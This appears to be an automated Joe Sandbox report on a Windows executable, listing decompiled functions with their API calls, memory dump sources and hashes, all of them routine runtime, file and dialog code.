                Function 0087A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008780B7,?,?,?), ref: 0087A351
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008780B7,?,?), ref: 0087A395
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008780B7,?,?,?,?,?,?,?,?), ref: 0087A416
                • CloseHandle.KERNEL32(?,?,00000000,?,008780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0087A41D
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 4d94b44d3ce160c98862a3a7520881580524c48984eab1f6fba311443d4c9c9b
                • Instruction ID: 820e280b4f9c37eefe125baebd82b1533d3109efef213572f6793a0bf1b05d2d
                • Opcode Fuzzy Hash: 4d94b44d3ce160c98862a3a7520881580524c48984eab1f6fba311443d4c9c9b
                • Instruction Fuzzy Hash: 0241CC30248384AAE725DF68CC45BAFBBE8FB81700F04891CB5D8E3295D664DA489B53
                Function 0089C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008989AD,?,00000000,?,00000001,?,?,00000001,008989AD,?), ref: 0089C0E6
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0089C16F
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008967E2,?), ref: 0089C181
                • __freea.LIBCMT ref: 0089C18A
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: f2c02052ed1e07623d9af5bb969f04b58148d3f64966ef51fa5df54228345167
                • Instruction ID: f8cc262fc9959b56e22c7d5480da9042508d295b731c6d441e80ac637ee177cd
                • Opcode Fuzzy Hash: f2c02052ed1e07623d9af5bb969f04b58148d3f64966ef51fa5df54228345167
                • Instruction Fuzzy Hash: DE31ED72A0020AABDF25AF69DC85DAE7BA5FB45310F080128FC04D7291EB36CD50CBA0
                Function 00892503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 0089251A
                  • Part of subcall function 00892B52: ___AdjustPointer.LIBCMT ref: 00892B9C
                • _UnwindNestedFrames.LIBCMT ref: 00892531
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00892543
                • CallCatchBlock.LIBVCRUNTIME ref: 00892567
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID:
                • API String ID: 2633735394-0
                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction ID: ff7298baedbf8c564f7f6a70680870e98c320352962d23fb174368e2c15e0335
                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction Fuzzy Hash: FE01E932000109BBCF12AF59DC41EDA3FBAFF58754F198414FD18A6121C376E961EBA1
                Function 00889DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 00889DBE
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00889DCD
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00889DDB
                • ReleaseDC.USER32(00000000,00000000), ref: 00889DE9
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 294034670bb71bec1e3e88a8caece82badf6352fb506aeb0adf0223e129b82ca
                • Instruction ID: 65b31e6d75fc193d3edf245a4cc84d4ae1e812c7bd57ea55dbd95f29d91fc1ff
                • Opcode Fuzzy Hash: 294034670bb71bec1e3e88a8caece82badf6352fb506aeb0adf0223e129b82ca
                • Instruction Fuzzy Hash: 71E0EC31986A21A7D3201BA8AC0DB9F3B58BB19712F054216F60596194DA704805CB94
                Function 00892016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00892016
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0089201B
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00892020
                  • Part of subcall function 0089310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0089311F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00892035
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction ID: f35d8f68d4fcee282de0c7d402aeeb3b53d2714c86e45fb9fb097fee5b58245a
                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction Fuzzy Hash: 32C04C24004A44F41C113ABE32021BD2740FC627C4B9E60C2F881D7113DE06061AE077
                Function 00889F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00889DF1: GetDC.USER32(00000000), ref: 00889DF5
                  • Part of subcall function 00889DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00889E00
                  • Part of subcall function 00889DF1: ReleaseDC.USER32(00000000,00000000), ref: 00889E0B
                • GetObjectW.GDI32(?,00000018,?), ref: 00889F8D
                  • Part of subcall function 0088A1E5: GetDC.USER32(00000000), ref: 0088A1EE
                  • Part of subcall function 0088A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0088A21D
                  • Part of subcall function 0088A1E5: ReleaseDC.USER32(00000000,?), ref: 0088A2B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: f6b6ee944014d2081b4f39e1fe691a603985013bfe476f34758924e183bf464e
                • Instruction ID: 5c9460b74941cb83b8c87f2476d849a1e57f71f602aaf5509b2c956a6a93b01b
                • Opcode Fuzzy Hash: f6b6ee944014d2081b4f39e1fe691a603985013bfe476f34758924e183bf464e
                • Instruction Fuzzy Hash: F2810475208614AFD714DF68C844A6ABBE9FF89705F00491EF98AD7260DB31AE05CB52
                Function 00880E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: e519db9c8d8c7c2dd5f31f53cc6b9be550e08dab0354b26116d5f5fd6fb8cb2e
                • Instruction ID: 188be662c529a83480d7f999cff4a8bfe592206b02336587e28e8525962e3ec3
                • Opcode Fuzzy Hash: e519db9c8d8c7c2dd5f31f53cc6b9be550e08dab0354b26116d5f5fd6fb8cb2e
                • Instruction Fuzzy Hash: 8951963118CB08FAFE713AE4CD46F377669FB14B04F208906B79AE48D6CA9154546B13
                Function 0089A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 0089AA84
                  • Part of subcall function 00898849: IsProcessorFeaturePresent.KERNEL32(00000017,00898838,00000050,008A3958,?,0087CFE0,00000004,008B0EE8,?,?,00898845,00000000,00000000,00000000,00000000,00000000), ref: 0089884B
                  • Part of subcall function 00898849: GetCurrentProcess.KERNEL32(C0000417,008A3958,00000050,008B0EE8), ref: 0089886D
                  • Part of subcall function 00898849: TerminateProcess.KERNEL32(00000000), ref: 00898874
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                • String ID: *?$.
                • API String ID: 2667617558-3972193922
                • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                • Instruction ID: 89faab07ac052aee574ef9cf965d08256911e731e31041125f57d6cf9f3be296
                • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                • Instruction Fuzzy Hash: A651A271E0011A9FDF18EFA8C8819ADBBF5FF58314F298169E854E7340E6319E01CB91
                Function 0087772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00877730
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008778CC
                  • Part of subcall function 0087A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A458
                  • Part of subcall function 0087A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A27A,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A489
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: 0cfed6116cc8e19647b4e48c3e526462f714528bb64281271c964971dae2906c
                • Instruction ID: 06ca6fb4fea43947b74eadafbd863f51a9c8cf137bfaff1817d38ef17836fa97
                • Opcode Fuzzy Hash: 0cfed6116cc8e19647b4e48c3e526462f714528bb64281271c964971dae2906c
                • Instruction Fuzzy Hash: 77415171805258AAEB24EB54CD45EEEB37CFF45300F0081A9B64DE6196EB749F84CF62
                Function 0087B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: 4bf14deb3bd738c59622c6c6aceac4ccefd2c9140886dda47675cd37b26d9cad
                • Instruction ID: ea5252018764aebddce1f9c4bb51c5c7551303f58a7aaea137f4bd0ae7e990de
                • Opcode Fuzzy Hash: 4bf14deb3bd738c59622c6c6aceac4ccefd2c9140886dda47675cd37b26d9cad
                • Instruction Fuzzy Hash: AF41713580025DABCF20AF25DC41FAB77AAFF85790B10C025F92CD725AE774DA41C661
                Function 00888FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: d348b2d5225edf2e318a8bae6adaade219a8994463c47c5f4511e7d9403905fb
                • Instruction ID: 2eb9646891089aabc33bed1a88be6622996c165252b3d14e060bedc242255065
                • Opcode Fuzzy Hash: d348b2d5225edf2e318a8bae6adaade219a8994463c47c5f4511e7d9403905fb
                • Instruction Fuzzy Hash: 2E217E71204714DFDB18AF68C895A3A77A8FF88712B18856DF949DB282DF70ED00CB61
                Function 0087EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0087EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087EB92
                  • Part of subcall function 0087EB73: GetProcAddress.KERNEL32(008B81C0,CryptUnprotectMemory), ref: 0087EBA2
                • GetCurrentProcessId.KERNEL32(?,?,?,0087EBEC), ref: 0087EC84
                Strings
                • CryptUnprotectMemory failed, xrefs: 0087EC7C
                • CryptProtectMemory failed, xrefs: 0087EC3B
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: a7702967f3cd607709a71d3511fda4038a45de1617e550498b79bf3f80187dd0
                • Instruction ID: c1d128d745b0a74df33836b511eaa64d2e90115a72c41fb58c68dc75db722b8f
                • Opcode Fuzzy Hash: a7702967f3cd607709a71d3511fda4038a45de1617e550498b79bf3f80187dd0
                • Instruction Fuzzy Hash: 3F11AF31A11624AFEB125B38CD066AE3B08FF49710B04C185FC09EF289CB34EE018BD5
                Function 00880889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNEL32(00000000,00010000,008809D0,?,00000000,00000000), ref: 008808AD
                • SetThreadPriority.KERNEL32(?,00000000), ref: 008808F4
                  • Part of subcall function 00876E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876EAF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                • Opcode ID: 93ca95b957655f826e98d1be6daf3b88919395f506ef90d2c95304cb681699be
                • Instruction ID: fe8fc0a61d011184881ac896dd8540d99157851935bbe3198c1615f0e9b0dc82
                • Opcode Fuzzy Hash: 93ca95b957655f826e98d1be6daf3b88919395f506ef90d2c95304cb681699be
                • Instruction Fuzzy Hash: 6701D6B63443056FE6207F58EC82BB67398FB41711F20003DF686D22C1CEA1B8849F65
                Function 0087130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0087DA98: _swprintf.LIBCMT ref: 0087DABE
                  • Part of subcall function 0087DA98: _strlen.LIBCMT ref: 0087DADF
                  • Part of subcall function 0087DA98: SetDlgItemTextW.USER32(?,008AE154,?), ref: 0087DB3F
                  • Part of subcall function 0087DA98: GetWindowRect.USER32(?,?), ref: 0087DB79
                  • Part of subcall function 0087DA98: GetClientRect.USER32(?,?), ref: 0087DB85
                • GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                • SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                • Opcode ID: 068077681f07a56d38f53829da080e9cde24d91e50f37f271d3fb549526186b4
                • Instruction ID: 3baf0033ac12f118b13420ea386bfc37e75b22b7ce07a2c8312e327948e42d54
                • Opcode Fuzzy Hash: 068077681f07a56d38f53829da080e9cde24d91e50f37f271d3fb549526186b4
                • Instruction Fuzzy Hash: 91F0693010024CA6DF250E68880DBEA3BA8FB21709F08C014BD6DD4EA5C778C995EA20
                Function 0088084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,00880A78,?), ref: 00880854
                • GetLastError.KERNEL32(?), ref: 00880860
                  • Part of subcall function 00876E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876EAF
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00880869
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
